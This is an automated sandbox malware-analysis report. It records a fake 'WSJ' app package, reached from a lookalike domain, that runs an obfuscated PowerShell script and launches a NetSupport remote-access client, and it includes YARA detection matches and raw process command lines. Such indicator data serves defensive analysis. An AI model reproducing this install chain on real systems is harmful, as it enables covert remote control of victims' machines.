Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D28BB	26_2_00007FF9BB3D28BB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D08CD	26_2_00007FF9BB3D08CD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D48CC	26_2_00007FF9BB3D48CC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CB864	26_2_00007FF9BB3CB864
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E7869	26_2_00007FF9BB3E7869
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C887E	26_2_00007FF9BB3C887E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E907B	26_2_00007FF9BB3E907B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C587E	26_2_00007FF9BB3C587E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CE093	26_2_00007FF9BB3CE093
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CEF1D	26_2_00007FF9BB3CEF1D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D3736	26_2_00007FF9BB3D3736
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3EE72D	26_2_00007FF9BB3EE72D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3EEF2D	26_2_00007FF9BB3EEF2D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D6730	26_2_00007FF9BB3D6730
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3DE745	26_2_00007FF9BB3DE745
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3ED6ED	26_2_00007FF9BB3ED6ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C5EFB	26_2_00007FF9BB3C5EFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D6F14	26_2_00007FF9BB3D6F14
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C7F10	26_2_00007FF9BB3C7F10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D4F9F	26_2_00007FF9BB3D4F9F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E6F99	26_2_00007FF9BB3E6F99
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C17B6	26_2_00007FF9BB3C17B6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C6FC1	26_2_00007FF9BB3C6FC1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C67CA	26_2_00007FF9BB3C67CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CA75E	26_2_00007FF9BB3CA75E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3DDF60	26_2_00007FF9BB3DDF60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3EF75D	26_2_00007FF9BB3EF75D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3EFF5D	26_2_00007FF9BB3EFF5D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F0F5D	26_2_00007FF9BB3F0F5D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3DCF5F	26_2_00007FF9BB3DCF5F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E8F5B	26_2_00007FF9BB3E8F5B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3DA771	26_2_00007FF9BB3DA771
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CBF6D	26_2_00007FF9BB3CBF6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3EDF88	26_2_00007FF9BB3EDF88
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CF784	26_2_00007FF9BB3CF784
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C4F94	26_2_00007FF9BB3C4F94
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F361D	26_2_00007FF9BB3F361D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E6E19	26_2_00007FF9BB3E6E19
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D561C	26_2_00007FF9BB3D561C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E5E1B	26_2_00007FF9BB3E5E1B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F062D	26_2_00007FF9BB3F062D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F4E3D	26_2_00007FF9BB3F4E3D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C3654	26_2_00007FF9BB3C3654
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E0E4C	26_2_00007FF9BB3E0E4C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CE5E1	26_2_00007FF9BB3CE5E1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3EBDF5	26_2_00007FF9BB3EBDF5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D3DFC	26_2_00007FF9BB3D3DFC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D1EA0	26_2_00007FF9BB3D1EA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E66AB	26_2_00007FF9BB3E66AB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CDE63	26_2_00007FF9BB3CDE63
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F265D	26_2_00007FF9BB3F265D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F4675	26_2_00007FF9BB3F4675
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3DD674	26_2_00007FF9BB3DD674
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CAE86	26_2_00007FF9BB3CAE86
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CD696	26_2_00007FF9BB3CD696
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C1E97	26_2_00007FF9BB3C1E97
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E4E8D	26_2_00007FF9BB3E4E8D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3DA527	26_2_00007FF9BB3DA527
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3EF51D	26_2_00007FF9BB3EF51D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CA537	26_2_00007FF9BB3CA537
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3DDD2A	26_2_00007FF9BB3DDD2A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3DE529	26_2_00007FF9BB3DE529
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CF53B	26_2_00007FF9BB3CF53B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D9557	26_2_00007FF9BB3D9557
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D9CDE	26_2_00007FF9BB3D9CDE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F0CDD	26_2_00007FF9BB3F0CDD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F14DD	26_2_00007FF9BB3F14DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E84FD	26_2_00007FF9BB3E84FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C5512	26_2_00007FF9BB3C5512
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C3D11	26_2_00007FF9BB3C3D11
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3DBDA1	26_2_00007FF9BB3DBDA1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3EE59D	26_2_00007FF9BB3EE59D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3EED9D	26_2_00007FF9BB3EED9D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F1D9D	26_2_00007FF9BB3F1D9D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F2D9D	26_2_00007FF9BB3F2D9D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C6DB1	26_2_00007FF9BB3C6DB1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CFDAA	26_2_00007FF9BB3CFDAA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3EADBD	26_2_00007FF9BB3EADBD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C95D7	26_2_00007FF9BB3C95D7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3EBDCB	26_2_00007FF9BB3EBDCB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CCD75	26_2_00007FF9BB3CCD75
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D4D8F	26_2_00007FF9BB3D4D8F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB54647D	26_2_00007FF9BB54647D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB541DA1	26_2_00007FF9BB541DA1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB546593	26_2_00007FF9BB546593
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB6C061E	26_2_00007FF9BB6C061E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB6C45E8	26_2_00007FF9BB6C45E8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB6C8CA0	26_2_00007FF9BB6C8CA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BBB093A2	26_2_00007FF9BBB093A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BBB04B9D	26_2_00007FF9BBB04B9D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BBB093C5	26_2_00007FF9BBB093C5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BBB01AF1	26_2_00007FF9BBB01AF1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BBB1A282	26_2_00007FF9BBB1A282
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BBB089E1	26_2_00007FF9BBB089E1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BBB05007	26_2_00007FF9BBB05007
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BBB016C0	26_2_00007FF9BBB016C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BBB09E05	26_2_00007FF9BBB09E05
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BBB03D2C	26_2_00007FF9BBB03D2C
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11029200	32_2_11029200
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_110612D0	32_2_110612D0
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_110724D0	32_2_110724D0
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1102B1F0	32_2_1102B1F0
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1115B090	32_2_1115B090
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1106F200	32_2_1106F200
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1107F590	32_2_1107F590
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1115F900	32_2_1115F900
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1101B950	32_2_1101B950
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11163B65	32_2_11163B65
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1101BD90	32_2_1101BD90
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_110503E0	32_2_110503E0
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1116A6AB	32_2_1116A6AB
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_110329A0	32_2_110329A0
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11122860	32_2_11122860
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1100887B	32_2_1100887B
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11044B90	32_2_11044B90
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1101CBB0	32_2_1101CBB0
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11086D60	32_2_11086D60
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BEBA980	32_2_6BEBA980
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BEE4910	32_2_6BEE4910
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BED43C0	32_2_6BED43C0
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BEE4156	32_2_6BEE4156
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BEEA063	32_2_6BEEA063
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BEE4528	32_2_6BEE4528
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BEC84F0	32_2_6BEC84F0
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BEBDBA0	32_2_6BEBDBA0
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BEE3923	32_2_6BEE3923
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BEE3DB8	32_2_6BEE3DB8
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BEB1310	32_2_6BEB1310
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BEB1760	32_2_6BEB1760
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BEDD70F	32_2_6BEDD70F

Found potential string decryption / allocating functions

Source: C:\ProgramData\netsupport\client\client32.exe	Code function: String function: 110290C0 appears 1044 times
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: String function: 6BED9480 appears 53 times
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: String function: 6BEC7C70 appears 35 times
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: String function: 11142790 appears 584 times
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: String function: 6BEC7A90 appears 59 times
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: String function: 111606A0 appears 32 times
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: String function: 11080CC0 appears 44 times
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: String function: 6BEB6F50 appears 161 times
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: String function: 1116B6F0 appears 37 times
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: String function: 6BEB30A0 appears 48 times
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: String function: 6BEC7D00 appears 132 times
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: String function: 110274F0 appears 47 times
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: String function: 1115CAC3 appears 47 times
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: String function: 1105D350 appears 279 times

Yara signature match

Source: amsi64_7788.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2564, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7788, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.rans.evad.win@48/139@21/11

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_11059290 GetLastError,FormatMessageA,LocalFree,

32_2_11059290

Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1109C580 AdjustTokenPrivileges,FindCloseChangeNotification,		32_2_1109C580
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1109C4F0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,		32_2_1109C4F0

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_11095A00 GetTickCount,CoInitialize,CLSIDFromProgID,CoCreateInstance,CoUninitialize,

32_2_11095A00

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_110CC3D0 IsWindow,IsWindowVisible,SetForegroundWindow,FindResourceExA,LoadResource,LockResource,DialogBoxIndirectParamA,DialogBoxParamA,

32_2_110CC3D0

Source: C:\ProgramData\netsupport\client\client32.exe

32_2_11124DC0

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2736:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6264:120:WilError_03

Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe

File created: C:\Users\user\AppData\Local\Packages\microsoft.desktopappinstaller_8wekyb3d8bbwe\AC\Temp\APPX.h150xbbh9hh9t9qrahcglr31d.tmp

Jump to behavior

Source: C:\ProgramData\netsupport\client\client32.exe

File read: C:\ProgramData\netsupport\client\client32.ini

Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://wsj.pm/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2012,i,2892533121597599651,11552435548397906284,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe "C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe" -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca
Source: unknown	Process created: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe "C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe" /InvokerPRAID: App GroupPolicy
Source: unknown	Process created: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe"
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Process created: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe "PsfRunDll64.exe"
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -file .\tOUKLPvSz.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.wsj.com/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=404 --field-trial-handle=1996,i,16757572502617297566,4553058767684910018,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\ProgramData\netsupport\client\client32.exe "C:\ProgramData\netsupport\client\client32.exe"
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown	Process created: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe "C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe" -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca
Source: unknown	Process created: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe "C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe" /InvokerPRAID: App GroupPolicy
Source: unknown	Process created: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe"
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Process created: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe "PsfRunDll64.exe"
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -file .\tOUKLPvSz.ps1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2012,i,2892533121597599651,11552435548397906284,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
